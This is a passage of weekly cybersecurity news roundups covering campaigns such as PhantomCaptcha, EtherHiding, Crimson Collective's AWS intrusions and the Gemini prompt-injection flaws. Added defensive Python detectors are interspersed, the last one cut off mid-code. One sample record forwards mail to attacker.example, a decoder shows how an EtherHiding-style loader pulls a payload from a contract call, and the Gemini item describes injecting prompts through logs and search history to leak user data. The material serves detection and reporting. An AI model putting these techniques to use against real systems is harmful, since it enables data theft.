Researchers also observed a major wave of Jingle Thief activity between April and May 2025, during which the group compromised more than 60 user accounts within a single organization. The attackers conducted extensive reconnaissance in SharePoint and OneDrive, searching for financial workflows, IT documentation, and virtual machine configurations, all tied to gift card systems.

Exploiting cloud identities rather than endpoints furthers the trend of cloud-based cybercrime, where phished credentials and identity abuse let financially motivated actors scale operations while remaining under the radar. Jingle Thief’s campaign is a reminder to prioritize identity-based monitoring and cloud-native security measures that provide full visibility and real-time detection.
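One way to hunt for the traces these techniques leave, written here as an added example rather than code from Unit 42 or from this page: it scans Microsoft 365 unified audit log records for inbox rules that forward or bury mail, mailbox-level forwarding, and new authenticator registrations, then reports users who show more than one of them. The record layout (Operation, UserId, ClientIP, and an Exchange-style Parameters list of Name/Value pairs) is assumed to mirror a unified audit log export, and the sample records are constructed.

```python
"""Hunt for the mailbox-persistence and MFA-registration traces that
identity-only intrusions leave in the Microsoft 365 unified audit log.
Added example; the record shape (Operation, UserId, ClientIP and an
Exchange-style Parameters list) is assumed to mirror unified audit log
exports, and the records below are constructed for the demonstration."""
from __future__ import annotations

import json
from collections import defaultdict

INBOX_RULE_OPS = {"New-InboxRule", "Set-InboxRule"}
MAILBOX_OPS = {"Set-Mailbox"}
# Entra ID audit activity names written when a user adds an authenticator method.
MFA_REGISTRATION_OPS = {
    "User registered security info",
    "User registered all required security info",
}
FORWARD_PARAMS = ("ForwardTo", "ForwardAsAttachmentTo", "RedirectTo")


def _params(record: dict) -> dict:
    """Flatten the Exchange 'Parameters' list of {Name, Value} into a dict."""
    return {p["Name"]: p["Value"] for p in record.get("Parameters", [])}


def classify(record: dict) -> str | None:
    """Return a label for a single record, or None if it is not interesting."""
    op = record.get("Operation", "")
    p = _params(record)
    if op in INBOX_RULE_OPS:
        if any(k in p for k in FORWARD_PARAMS):
            return "inbox-rule:forwarding"
        if p.get("DeleteMessage") == "True" or p.get("MoveToFolder"):
            return "inbox-rule:hiding"  # rule that buries replies or security alerts
    if op in MAILBOX_OPS and (p.get("ForwardingSmtpAddress") or p.get("ForwardingAddress")):
        return "mailbox:forwarding"
    if op in MFA_REGISTRATION_OPS:
        return "mfa:new-method"
    return None


def suspicious_users(records: list[dict], min_labels: int = 2) -> dict[str, dict]:
    """Group labelled events by user and report users showing at least
    `min_labels` distinct techniques, with the client IPs involved.  A single
    benign inbox rule stays quiet; a rule plus a new MFA method does not."""
    per_user: dict[str, dict] = defaultdict(lambda: {"labels": set(), "ips": set()})
    for r in records:
        label = classify(r)
        if label is None:
            continue
        entry = per_user[r.get("UserId", "?")]
        entry["labels"].add(label)
        if r.get("ClientIP"):
            entry["ips"].add(r["ClientIP"])
    return {
        user: {"labels": sorted(v["labels"]), "ips": sorted(v["ips"])}
        for user, v in per_user.items()
        if len(v["labels"]) >= min_labels
    }


# Constructed sample export: one compromised user, one user with an ordinary rule.
SAMPLE_RECORDS = json.loads("""[
 {"Operation": "User registered security info", "UserId": "finance.user@example.com",
  "ClientIP": "203.0.113.9", "Parameters": []},
 {"Operation": "New-InboxRule", "UserId": "finance.user@example.com", "ClientIP": "203.0.113.9",
  "Parameters": [{"Name": "Name", "Value": "."},
                 {"Name": "SubjectContainsWords", "Value": "gift card;password;helpdesk"},
                 {"Name": "DeleteMessage", "Value": "True"}]},
 {"Operation": "Set-Mailbox", "UserId": "finance.user@example.com", "ClientIP": "203.0.113.9",
  "Parameters": [{"Name": "ForwardingSmtpAddress", "Value": "smtp:collector@attacker.example"}]},
 {"Operation": "New-InboxRule", "UserId": "pm.user@example.com", "ClientIP": "198.51.100.4",
  "Parameters": [{"Name": "Name", "Value": "Newsletters"},
                 {"Name": "MoveToFolder", "Value": "Reading"}]}
]""")

if __name__ == "__main__":
    for user, info in suspicious_users(SAMPLE_RECORDS).items():
        print(f"{user}: {', '.join(info['labels'])} from {', '.join(info['ips'])}")
```

Running it on the sample reports only finance.user, whose new MFA method, a rule named "." that deletes helpdesk mail, and an external forwarding address all come from one IP; the project manager’s filing rule is left alone. In a real tenant, feed it the Search-UnifiedAuditLog or Graph audit export and lower `min_labels` to 1 for forwarding to external domains.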

The Ugly | PhantomCaptcha Spearphishing Targets Ukraine’s Relief Networks

SentinelLABS, together with the Digital Security Lab of Ukraine, has uncovered ‘PhantomCaptcha’, a single-day spearphishing campaign that targeted Ukrainian regional government administrations and humanitarian organizations such as the International Red Cross, UNICEF, the Norwegian Refugee Council, and other NGOs linked to war relief efforts.

Launched on October 8, 2025, the operation began with an impersonation of the Ukrainian President’s Office, distributing weaponized PDF attachments that redirected victims to a fake Zoom site (zoomconference[.]app). There, a fake Cloudflare CAPTCHA lured users into copying and pasting malicious PowerShell commands – a ClickFix technique designed to bypass traditional endpoint controls by tricking victims into executing the malware themselves.

Infection paths

Once running, the script deployed a multi-stage PowerShell payload leading to a WebSocket remote access trojan (RAT) hosted on Russian-owned infrastructure. The RAT enables arbitrary command execution, data exfiltration, and the potential deployment of further malware over encrypted WebSocket communications. Although investigations show that the attackers spent six months preparing the campaign, it remained active for only 24 hours, a pattern that points to deliberate operational security and planning.

SentinelLABS linked the campaign to an additional Android-based espionage effort hosted on princess-mens[.]click, which distributes spyware-laden APKs disguised as adult entertainment or cloud storage apps designed to harvest contacts, media files, and geolocation data.

While attribution remains unconfirmed, technical overlaps, including the ClickFix lure and Russian-hosted C2s, suggest possible ties to COLDRIVER (aka UNC4057 or Star Blizzard), a threat group linked to Russia’s Federal Security Service (FSB). PhantomCaptcha is an example of a highly organized and adaptive adversary, able to blend social engineering, short-lived but highly compartmentalized infrastructure, and cross-platform espionage to target Ukraine’s humanitarian and government sectors.

The Good, the Bad and the Ugly in Cybersecurity – Week 42

The Good | DOJ Seizes $15B in Crypto, Targets Global Scam Ring & PowerSchool Hacker

The U.S. Department of Justice has seized $15 billion in bitcoin from the Prince Group, a vast criminal syndicate behind cryptocurrency scams known as romance baiting. Led by fugitive Chen Zhi (aka Vincent), the group defrauded billions from victims through fake investment schemes disguised as romantic or business opportunities. Operating across 30+ countries, Prince Group forced trafficked workers into Cambodian compounds to run these scams under threat of violence.

The organization laundered illicit gains through complex crypto transfers before converting them into cash for luxury assets, including yachts, jets, and even a Picasso painting. In coordination with the U.K., the U.S. Treasury has sanctioned Zhi and 146 of his associates. Authorities estimate that Americans lost $16.6 billion to such scams last year, with Southeast Asian-based operations driving most of this increase. As global authorities intensify crackdowns on large-scale fraud and cybercrime operations, U.S. law enforcement continues to pursue domestic offenders exploiting digital platforms for profit.

Matthew D. Lane, a 19-year-old from Massachusetts, was sentenced to four years in prison and ordered to pay $14 million in restitution for orchestrating a severe cyberattack on PowerSchool, a leading K–12 software provider serving over 60 million students worldwide. Lane and his accomplices used stolen subcontractor credentials to breach PowerSchool’s systems, stealing data on 9.5 million teachers and 62.4 million students, including social security numbers and medical records. They demanded $2.85 million in Bitcoin under the alias “Shiny Hunters”.

Source: Brad Petrishen – USA TODAY NETWORK via Imagn Images

Despite PowerSchool paying an undisclosed ransom to prevent a data leak, the group continued additional extortion attempts on several affected school districts. Lane pleaded guilty to multiple federal cybercrime charges in May.

The Bad | North Korean Hackers Deploy EtherHiding to Steal Cryptocurrency

North Korean state-sponsored hackers have begun using a novel malware-hosting method called “EtherHiding” to steal cryptocurrency, marking the first time a nation-state actor has employed this blockchain-based technique. Researchers attribute the activity to the DPRK-linked cluster UNC5342, which has been deploying EtherHiding since February 2025 as part of its ongoing “Contagious Interview” campaign. The group uses fake job offers to lure software developers, posing as recruiters from fake companies. During technical assessments, victims are tricked into running malicious code, initiating the multi-stage infection chains.

EtherHiding embeds malicious payloads within smart contracts on public blockchains, including Ethereum and Binance Smart Chain, allowing attackers to fetch the malware through read-only contract calls that create no on-chain transaction and so leave no record on the ledger. The method provides anonymity, is resilient to takedowns, and lets operators update payloads cheaply, at an average of $1.37 USD per update. The payloads include JADESNOW, a JavaScript downloader, and InvisibleFerret, a backdoor for credential theft, remote control, and exfiltration of cryptocurrency wallet data and browser-stored passwords.

UNC5342 EtherHiding on BNB Smart Chain and Ethereum (Source: GTIG)

Researchers note that the threat actor’s use of multiple blockchains suggests operational compartmentalization and makes forensic analysis more difficult. The approach demonstrates a shift toward bulletproof hosting, using blockchain technology to create takedown-resistant, flexible malware distribution.
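What a read-only fetch actually looks like on the wire, as an added example that is not the actors’ or GTIG’s code: the loader sends a JSON-RPC eth_call to a public node and receives the contract getter’s return value ABI-encoded as a dynamic string (offset word, length word, padded bytes). The decoder below recovers that string from a captured response; the contract address, four-byte selector and payload are constructed placeholders (the real selector is the first four bytes of keccak256 over the function signature, which this example takes as given because hashlib has no keccak).

```python
"""Decode the ABI-encoded `string` an EtherHiding-style loader receives from a
read-only eth_call.  Added example; the address, selector and payload are
constructed placeholders, not values from the campaign described above."""
from __future__ import annotations

import json

WORD = 32  # ABI encodes everything in 32-byte words


def decode_abi_string(hexdata: str) -> str:
    """Decode a single dynamic `string` return value: [offset][length][bytes, padded]."""
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if len(raw) < 2 * WORD or len(raw) % WORD:
        raise ValueError("not a well-formed ABI string return")
    offset = int.from_bytes(raw[:WORD], "big")
    length = int.from_bytes(raw[offset:offset + WORD], "big")
    start = offset + WORD
    if start + length > len(raw):
        raise ValueError("declared length exceeds payload")
    return raw[start:start + length].decode("utf-8")


def encode_abi_string(value: str) -> str:
    """Inverse of decode_abi_string, used here to build the sample response."""
    data = value.encode("utf-8")
    pad = (-len(data)) % WORD
    body = WORD.to_bytes(WORD, "big") + len(data).to_bytes(WORD, "big") + data + b"\x00" * pad
    return "0x" + body.hex()


def build_eth_call(contract: str, selector: str, block: str = "latest") -> dict:
    """JSON-RPC body for a no-argument getter.  eth_call runs locally on the
    node: no transaction, no gas, nothing written to the chain, so the only
    record is the node or proxy log of the HTTP request."""
    return {"jsonrpc": "2.0", "id": 1, "method": "eth_call",
            "params": [{"to": contract, "data": selector}, block]}


# Constructed values: placeholder address/selector and a harmless script body
# standing in for the obfuscated JavaScript a real contract would return.
SAMPLE_CONTRACT = "0x" + "ab" * 20
SAMPLE_SELECTOR = "0x1a2b3c4d"
SAMPLE_PAYLOAD = "console.log('stage-two placeholder')"
SAMPLE_RESPONSE = {"jsonrpc": "2.0", "id": 1, "result": encode_abi_string(SAMPLE_PAYLOAD)}


def extract_payload(rpc_response: dict) -> str:
    """Pull the script out of a captured eth_call response."""
    return decode_abi_string(rpc_response["result"])


if __name__ == "__main__":
    print(json.dumps(build_eth_call(SAMPLE_CONTRACT, SAMPLE_SELECTOR)))
    print(extract_payload(SAMPLE_RESPONSE))
```

For defenders the useful consequence is where the evidence lives: because nothing is written to the chain, the retrieval shows up only as an outbound HTTPS POST to a blockchain RPC endpoint from a developer workstation, which is the egress to alert on.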

Users should exercise caution with job-related downloads and adopt best practices such as testing files in isolated environments, restricting executable file types, and enforcing strict browser policies to block script auto-execution.

The Ugly | Flaws in Microsoft Defender Could Lead to Theft of Data

Researchers have reported unpatched vulnerabilities in Microsoft Defender for Endpoint (DFE) that could enable attackers to bypass authentication, spoof data, exfiltrate sensitive information, and inject malicious files into forensic evidence collections used by security analysts.

Reported to Microsoft’s Security Response Center in July 2025, the issues were categorized as low severity, with no confirmed fixes as of this writing. Researchers tracking the flaws focused on how the agent communicated with cloud backends, using tools like Burp Suite and WinDbg memory patches to bypass certificate pinning in MsSense.exe and SenseIR.exe, allowing plaintext interception of HTTPS traffic, including Azure Blob uploads.

Requests can be intercepted including data uploads to an Azure Blob (Source: InfoGuard Labs)

The core problem lies in DFE requests to endpoints such as /edr/commands/cnc and /senseir/v1/actions/, where Authorization tokens and headers are ignored. Low-privileged users can obtain machine and tenant IDs from the registry to impersonate the agent, intercept commands, or spoof responses such as faking an “already isolated” status while leaving devices exposed. Similarly, CloudLR tokens for Live Response and Automated Investigations are ignored, allowing payload manipulation and uploads to Azure Blob URIs.

In addition, attackers can access 8MB configuration dumps without credentials, revealing detection logic like RegistryMonitoringConfiguration and ASR rules, while investigation packages on disk can be tampered with, embedding malicious files disguised as legitimate artifacts.

Despite responsible disclosure by the researchers concerned, it remains unknown whether Microsoft will patch the flaws any time soon.

The Good, the Bad and the Ugly in Cybersecurity – Week 41

The Good | Teens Arrested in Nursery Doxing Case as OpenAI Disrupts Cybercrime Clusters

U.K. police have arrested two 17-year-olds in Hertfordshire for allegedly doxing children following a ransomware attack on London-based Kido nurseries. The Radiant Group claimed responsibility, saying it stole sensitive data and photos of over 8,000 children and leaked some online to extort Kido. The files were later removed after the group’s threats to both Kido and parents of the affected children failed to make headway. Kido, which supports over 15,000 families in the U.K., U.S., China, and India, confirmed the breached data was hosted by Famly, a nursery software platform, which said its own systems were not compromised.

The UK’s NCSC called the attack on children “particularly egregious” and the Met Police emphasized their commitment to bringing the perpetrators to justice. The arrests reflect a wider trend of teenagers involved in major U.K. cyberattacks, with recent cases linked to Marks & Spencer, Co-op, Harrods, and Transport for London.

Also this week, OpenAI said it disrupted three malicious activity clusters abusing ChatGPT for cybercrime and influence operations. The first involved Russian-speaking actors using multiple accounts to develop components of remote access trojans (RATs), credential stealers, and data exfiltration tools. The second, tied to North Korean actors, used ChatGPT to assist in malware, phishing, and C2 development – using the chatbot to draft copy, perform experiments, and explore new techniques. The third was linked to Chinese threat group ‘UNK_DropPitch’, which leveraged the tool to create multilingual phishing content and automate hacking tasks.

Beyond these, OpenAI also blocked networks from Cambodia, Myanmar, Nigeria, Russia, and China for using AI in scams, propaganda, and surveillance, though all mentioned actors tried to mask signs of their abuse of the tool to further their operations.

The Bad | Crimson Collective Breaches Cloud Systems to Steal Data & Extort Victims

A threat group called ‘Crimson Collective’ has launched a series of targeted attacks on AWS cloud environments, stealing sensitive data and extorting victims through multi-stage intrusions. The group just recently exfiltrated 570 GB of data from thousands of private GitLab repositories before joining forces with Scattered Lapsus$ Hunters to intensify its extortion efforts.

Researchers explain that Crimson Collective’s operations begin with harvesting exposed long-term access keys using open-source tools such as TruffleHog. Once inside, the attackers create new IAM users and escalate privileges by attaching administrative policies, gaining effective control over the compromised environment. They then enumerate users, databases, and storage systems in preparation for large-scale data theft.

The group’s exfiltration process involves resetting database master passwords and creating database snapshots, which are then exported to S3 through API calls. EBS (Elastic Block Store) volumes are also created from snapshots and attached to EC2 instances launched under permissive security groups to move data more freely. Victims typically receive ransom demands through in-platform email services and from external addresses once exfiltration is complete.

Extortion note from Crimson Collective (Source: Rapid7)

Investigations found that the group employs many IP addresses, some reused across different incidents, which allowed partial tracking of its operations. While Crimson Collective’s size and infrastructure remain unclear, its extortion tactics indicate an expanding threat to organizations relying on cloud-based infrastructure. Using short-term, least-privileged credentials and enforcing IAM policies can help mitigate the chance of breaches.

Researchers warn that leaked credentials and lax privilege management continue to be major enablers for these attacks, and urge companies to tighten access controls, limit credential lifespan, and regularly audit for exposed secrets using open-source scanning tools.
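The chain above (leaked long-term key, new admin principal, database password reset and snapshot, export to S3, world-open security group) is detectable in CloudTrail when the stages are correlated per principal rather than alerted on one at a time. The following is an added example, not Rapid7’s tooling or code from this page: it maps each record to a phase of the chain and reports principals whose activity spans several phases. The event names and requestParameters layouts follow CloudTrail’s real shapes; the account, key IDs and bucket names are constructed.

```python
"""Stage-based detection for a CloudTrail intrusion chain of the kind
described above.  Added example; event names and requestParameters layouts
mirror CloudTrail, but the records are constructed and the key IDs, account
and bucket are placeholders."""
from __future__ import annotations

import json
from collections import defaultdict


def stage_for(event: dict) -> str | None:
    """Map one CloudTrail record onto a phase:technique label, or None."""
    name = event.get("eventName", "")
    req = event.get("requestParameters") or {}
    if name == "CreateUser":
        return "persistence:new-user"
    if name == "CreateAccessKey":
        return "persistence:new-access-key"
    if name == "AttachUserPolicy" and req.get("policyArn", "").endswith("/AdministratorAccess"):
        return "privesc:administrator-access"
    if name == "ModifyDBInstance" and "masterUserPassword" in req:
        return "collection:db-password-reset"  # CloudTrail redacts the value, keeps the key
    if name in ("CreateDBSnapshot", "CreateDBClusterSnapshot"):
        return "collection:db-snapshot"
    if name in ("CreateVolume", "AttachVolume"):
        return "collection:ebs-volume"
    if name == "StartExportTask":
        return "exfil:snapshot-export-to-s3"
    if name == "AuthorizeSecurityGroupIngress" and "0.0.0.0/0" in json.dumps(req):
        return "exfil:world-open-security-group"
    return None


def principal_of(event: dict) -> str:
    """Key on the access key when present so a renamed user still correlates."""
    ident = event.get("userIdentity", {})
    return ident.get("accessKeyId") or ident.get("arn", "unknown")


def detect_chains(events: list[dict], min_phases: int = 3) -> dict[str, list[str]]:
    """Return principals whose activity spans at least `min_phases` distinct
    phases (persistence / privesc / collection / exfil).  A lone CreateUser by
    a human admin stays quiet; user + admin policy + snapshot export does not."""
    stages: dict[str, set[str]] = defaultdict(set)
    for e in events:
        s = stage_for(e)
        if s:
            stages[principal_of(e)].add(s)
    out: dict[str, list[str]] = {}
    for principal, seen in stages.items():
        phases = {s.split(":", 1)[0] for s in seen}
        if len(phases) >= min_phases:
            out[principal] = sorted(seen)
    return out


# Constructed CloudTrail excerpt: one leaked key walking the chain, one admin
# doing routine onboarding.
SAMPLE_EVENTS = json.loads("""[
 {"eventName": "CreateUser", "userIdentity": {"accessKeyId": "AKIAEXAMPLELEAKED"},
  "requestParameters": {"userName": "svc-backup"}},
 {"eventName": "AttachUserPolicy", "userIdentity": {"accessKeyId": "AKIAEXAMPLELEAKED"},
  "requestParameters": {"userName": "svc-backup",
                        "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}},
 {"eventName": "ModifyDBInstance", "userIdentity": {"accessKeyId": "AKIAEXAMPLELEAKED"},
  "requestParameters": {"dBInstanceIdentifier": "prod-db", "masterUserPassword": "****"}},
 {"eventName": "CreateDBSnapshot", "userIdentity": {"accessKeyId": "AKIAEXAMPLELEAKED"},
  "requestParameters": {"dBInstanceIdentifier": "prod-db", "dBSnapshotIdentifier": "tmp-1"}},
 {"eventName": "StartExportTask", "userIdentity": {"accessKeyId": "AKIAEXAMPLELEAKED"},
  "requestParameters": {"exportTaskIdentifier": "tmp-1", "s3BucketName": "staging-bucket"}},
 {"eventName": "AuthorizeSecurityGroupIngress", "userIdentity": {"accessKeyId": "AKIAEXAMPLELEAKED"},
  "requestParameters": {"groupId": "sg-0abc", "ipPermissions": {"items": [
      {"ipProtocol": "tcp", "fromPort": 22, "toPort": 22,
       "ipRanges": {"items": [{"cidrIp": "0.0.0.0/0"}]}}]}}},
 {"eventName": "CreateUser", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/alice"},
  "requestParameters": {"userName": "new-hire"}}
]""")

if __name__ == "__main__":
    for principal, seen in detect_chains(SAMPLE_EVENTS).items():
        print(principal, "->", ", ".join(seen))
```

Keying on the access key rather than the user name matters here: the leaked key is the constant across the whole chain, whereas the user names it creates are disposable. Pair the detector with an inventory of long-lived keys so the access key that fires can be revoked, not just the user it created.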

The Ugly | Attackers Breach Discord Ticketing Support, Exposing Data of 5.5M Users

Threat actors claiming to have breached Discord’s customer support systems are now threatening to leak data allegedly stolen from millions of users after the company refused to pay ransom demands. This latest threat follows reports that the attackers first gained access to a third-party support provider in late September, exfiltrating sensitive user information such as names, emails, government IDs, and partial payment details.

Discord confirmed that the compromise affected a vendor system used for customer service, not its internal infrastructure, and said around 70,000 users had their government ID photos exposed – far fewer than the 2.1 million claimed by the attackers. The company stressed that inflated figures and ransom demands were part of an extortion campaign and that it will not reward illegal actions.

According to the threat actors, they accessed Discord’s support platform for 58 hours through a compromised account belonging to an outsourced support agent. They claim to have taken 1.6 terabytes of data in that window, including 8.4 million support tickets affecting 5.5 million users, roughly 580,000 of which contained partial payment information. The attackers also said integrations between the support system and Discord’s internal database allowed them to run millions of API queries for additional user data.

The actors initially demanded $5 million, later reducing it to $3.5 million before Discord ended negotiations and went public with the breach. The group has since threatened to release the stolen data, marking one of the largest extortion-driven data thefts to hit a major communication platform in 2025.

The Good, the Bad and the Ugly in Cybersecurity – Week 40

The Good | UK Convicts “Bitcoin Queen” in World’s Largest Cryptocurrency Seizure

This week, a court in the UK convicted Bitcoin fraudster Qian Zhimin (aka Zhang Yadi) of acquiring and possessing criminal property after a seven-year pursuit and the recovery of stolen crypto assets now worth $7.3 billion.

Qian, a 47-year-old Chinese national, had profited from a multibillion-dollar fraud scheme between 2014 and 2017, in which she convinced around 130,000 unwitting victims to invest in “digital gold” by promising returns of 100-300%.

Dubbed “the Bitcoin Queen”, Qian fled from China to the UK using a false passport after authorities began investigating her in 2017. She then attempted to launder her funds through an accomplice, Wen Jian, a 42-year-old woman who facilitated the purchase of property, jewellery and other high-value assets on Qian’s behalf.

Qian Zhimin (left) and Wen Jian (right) (Source)

In 2018, authorities seized a number of digital devices from Qian and Wen’s London home, but it was not until 2021 that they realized the devices contained digital wallets holding 61,000 Bitcoin, worth at that time around a billion dollars. Wen was subsequently arrested in 2022 and convicted in 2024. Qian remained at large until her arrest in April 2024. Qian’s sentencing has been set for next month.

What happens to the seized funds remains the subject of some controversy since the value of the Bitcoin now far exceeds that of the funds invested by victims. Both the UK government and representatives of the Chinese victims are seeking restitution.

The Bad | Hackers Exploit Milesight Routers to Send Phishing SMS to Users

New research suggests that multiple threat actors may have been abusing a known flaw in Milesight cellular routers to send SMS phishing (smishing) messages to users in several countries since at least 2022. A patch for the flaw, CVE-2023-43261, was released in 2023, but analysis suggests many unpatched devices remain reachable from the public internet.

The researchers say that attackers have been exploiting the vulnerable routers to send large volumes of SMS messages mimicking government services, banks and delivery companies. Victims receive legitimate looking texts urging them to click malicious links, which redirect to mobile-optimized phishing pages.

The attack is made possible by a flaw that lets anyone retrieve log messages from exposed routers through unauthenticated API calls. The logs contain encrypted administrator credentials, which attackers can decrypt using a hardcoded AES key found in the client-side JavaScript; the recovered credentials then authenticate further API calls. Encrypting a secret with a key that ships to every browser offers no protection once the key is read out of the script.

The researchers also believe other bugs may be in play as they noted evidence that many exposed devices were running outdated firmware with other known vulnerabilities.

Analysis of the targeted phone numbers indicates that Europe is the primary region affected by the smishing campaigns, with Belgium heavily targeted; however, vulnerable devices were also observed in Australia, Turkey, Singapore and even North America. In one of a number of campaigns, SMS lures using the domain disney[.]plus-billing[.]sbs and referencing a payment issue urged recipients to click a malicious link.

Phishing messages in several languages, including French, Italian and English, were observed. The researchers believe multiple campaigns have been in operation by different threat actor groups targeting the same vulnerable infrastructure.

Examples of malicious SMS messages (Source: Sekoia)

Vulnerable cellular routers offer an attractive target to threat actors, affording them the ability to send messages at scale without being flagged as malicious. Individuals and businesses are reminded that, as with other forms of phishing, heightened awareness and scepticism towards unsolicited SMS messages, even when they appear to come from trusted sources, is a vital first line of defense.

The Ugly | Trio of Flaws in Google Gemini Turn AI Into Attack Vehicle

AI is in the spotlight again this week with news that several products within Google’s family of AI models were vulnerable to search injection attacks, prompt injection attacks and exfiltration of user data, leading researchers to dub the flaws the ‘Gemini Trifecta’.

The flaws were found in Google Cloud Platform’s Gemini Cloud Assist, Gemini Search Personalization, and Gemini Browsing Tool, and serve as a reminder of the risks that AI brings to enterprises as threat actors look to manipulate such tools in their attacks. The researchers say they discovered three distinct components in the Gemini suite that had issues:

  • Gemini Cloud Assist — This prompt-injection vulnerability in Google Cloud’s Gemini Cloud Assist tool could have enabled attackers to exploit cloud-based services, potentially compromising cloud resources, and could also have enabled phishing attempts. It represents a new attack class, in the cloud and in general, in which attacker-controlled text written into logs poisons the AI’s inputs with arbitrary prompt injections.
  • Gemini Search Personalization Model — This search-injection vulnerability gave attackers the ability to inject prompts, control Gemini’s behavior and potentially leak the user’s saved information and location data by manipulating their Chrome search history.
  • Gemini Browsing Tool — This flaw allowed attackers to exfiltrate a user’s saved information and location data by abusing the browsing tool, putting user privacy at risk.
Gemini rendered the attacker’s message and inserted the phishing link into its log summary (Source: Tenable)

The vulnerabilities were reported to Google and have now been patched. However, it is important that enterprises view AI assistants not just as passive productivity tools but as active attack surfaces and treat them accordingly.

The Good, the Bad and the Ugly in Cybersecurity – Week 39

The Good | Law Enforcement Makes Swift Arrest After Attack on Airports

Authorities in the UK have been quick to arrest an individual in connection with the cyber attack on Collins Aerospace last Friday, which caused disruption at several European airports including Berlin, Brussels, Dublin, and Heathrow.

The attack on Collins’ MUSE (Multi User System Environment) software – responsible for passenger check-in, boarding and bag-drop processing – disrupted flights over the weekend, with carriers at Brussels airport told to cancel some 140 of 276 scheduled flights for the following Monday.

Meanwhile, Heathrow is said to have had more than a thousand computers “corrupted”, indicating a likely ransomware attack.

In Berlin, airport authorities said that as of Wednesday morning check-in and boarding were still being handled manually and that passengers should expect delays and cancellations.

A spokesperson for Dublin airport said manual workarounds for check-in and bag drops were still in place as of Wednesday and there was as yet no timeline for when things would return to normal.

An unidentified male in his 40s was arrested in West Sussex, UK on Tuesday evening on suspicion of Computer Misuse Act offences. The UK’s National Crime Agency (NCA) says the investigation remains at an early stage and is ongoing. The man has been released on bail pending further enquiries.

The Bad | DPRK Threat Actor Groups Collaborate to Weaponize Developer Identities

Researchers at ESET have this week offered further evidence that distinct DPRK threat actor groups responsible for the Contagious Interview campaign and the DPRK Fraudulent IT Worker campaign are likely working in concert, using identities stolen from the former to feed the recruitment drive of the latter.

Detailing the activities of a threat actor they call DeceptiveDevelopment, broadly overlapping those of Contagious Interview, the researchers say they uncovered new links between the two campaigns. DeceptiveDevelopment operators use LinkedIn and other social media platforms to pose as recruiters, using fraudulent job offers to lure job seekers and compromise their computers.

Meanwhile, operators running IT worker scams use the information stolen by DeceptiveDevelopment operators to pose as job seekers with companies they wish to infiltrate. The researchers say the fake IT workers initially targeted jobs in the U.S. but have now shifted to European countries such as France, Poland, and Ukraine.

While DeceptiveDevelopment focuses on malware, OSINT shows ties to North Korean IT workers who use fake identities to secure remote jobs, thus surreptitiously funding North Korean state operations. 5/6

— ESET Research (@esetresearch.bsky.social) 25 September 2025 at 10:24

Through an analysis of OSINT data and other research, ESET says the fake IT workers are organized into teams with members working between 10-16 hours per day, pursuing job opportunities, completing tasks and undertaking studies in topics such as web programming, blockchain, AI and English language. The members also use prepared scripts to try and recruit proxies in target countries who would be willing to attend interviews or run laptop farms.

The scale of the DPRK’s activities to infect job seekers and their potential or current employers, as well as to use stolen data to infiltrate companies as fraudulent workers, has surprised security researchers. The threat presents a different challenge from simply detecting and preventing isolated campaigns and underscores the need for security teams and recruitment teams to develop workflows that can identify fraudulent applications. At the same time, enterprises are urged to lock down their internal resources with a trusted security platform that can prevent both intrusions and insider threats.

The Ugly | China-Linked Threat Actor Drops Malware on Edge Devices That Sleeps for Over a Year

China-linked threat actors have been targeting U.S. firms in the tech and legal sectors with a stealthy backdoor known as BRICKSTORM, likely with the aim of infecting a broader range of downstream victims and feeding development of new zero days, Google’s Threat Intelligence Group (GTIG) has said this week.

Attributing the activity to UNC5221, GTIG said the threat cluster was distinct from the widely-reported activities of Silk Typhoon, named as responsible for a number of attacks on U.S. interests earlier this year. UNC5221’s activities are specifically focused on obtaining and maintaining long-term access via backdoors on appliances and network edge devices that typically cannot support endpoint security software due to limited processor power, memory and storage space.

The researchers said initial access was difficult to determine due to the lengthy dwell time between infection and attack, on average 393 days, which often exceeded log retention periods. However, in one case, it was determined that the intrusion leveraged a security flaw in Ivanti Connect Secure devices to obtain initial access.

Having gained a foothold, UNC5221 deploys BRICKSTORM, a Go-based backdoor for Linux and BSD systems, to a network appliance before pivoting to VMware vCenter and ESXi hosts using valid credentials captured from the appliance.

Source: GTIG

GTIG said a common theme across incidents was the threat actor’s interest in emails of key individuals within the victim organization, in particular those of developers and system administrators. The attackers used Microsoft’s Entra ID Enterprise Applications with mail.read and full_access_as_app scopes to gain access to every mailbox.

Hunting for BRICKSTORM creates challenges for defenders as the malware typically resides on devices that lack EDR telemetry. Google has released a scanner tool to help search for known samples, along with comprehensive advice for threat hunting and hardening of devices.
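The mailbox access described above runs through app-only permissions granted to Entra ID enterprise applications, which survive password resets and never appear as a user sign-in, so the inventory of those grants is a hunt in its own right. The following is an added example, not GTIG’s scanner or code from this page: it triages service principals for tenant-wide mail permissions and ranks the ones with recent grants, freshly added credentials, or registration in another tenant. The records are constructed to mirror Microsoft Graph servicePrincipal objects after their appRoleAssignments have been resolved from role IDs to permission names (do that resolution against the resource’s appRoles first; the GUIDs are deliberately not hard-coded here).

```python
"""Triage Entra ID application (app-only) permissions for tenant-wide mail
access.  Added example; the service principal records are constructed to
mirror Graph servicePrincipal objects with appRoleAssignments already
resolved to permission names, and the tenant and app IDs are placeholders."""
from __future__ import annotations

from datetime import datetime, timedelta, timezone

# Application permissions that read every mailbox in the tenant with no user present.
TENANT_WIDE_MAIL = {
    ("Microsoft Graph", "Mail.Read"),
    ("Microsoft Graph", "Mail.ReadWrite"),
    ("Office 365 Exchange Online", "full_access_as_app"),
}


def parse_ts(value: str) -> datetime:
    """Graph emits ISO-8601 with a trailing Z; make it timezone-aware."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def triage(service_principals: list[dict], tenant_id: str, now: datetime,
           recent_days: int = 30) -> list[dict]:
    """One finding per service principal holding tenant-wide mail permissions.
    Recent grants, freshly added credentials, and apps registered in another
    tenant are ranked 'high'; long-standing grants are 'review'."""
    cutoff = now - timedelta(days=recent_days)
    findings = []
    for sp in service_principals:
        risky, recent_grant = [], False
        for grant in sp.get("appRoleAssignments", []):
            if (grant["resourceDisplayName"], grant["permission"]) in TENANT_WIDE_MAIL:
                risky.append(grant["permission"])
                recent_grant |= parse_ts(grant["createdDateTime"]) >= cutoff
        if not risky:
            continue
        creds = sp.get("passwordCredentials", []) + sp.get("keyCredentials", [])
        recent_cred = any(parse_ts(c["startDateTime"]) >= cutoff for c in creds)
        foreign = sp.get("appOwnerOrganizationId") not in (None, tenant_id)
        findings.append({
            "app": sp["displayName"],
            "appId": sp["appId"],
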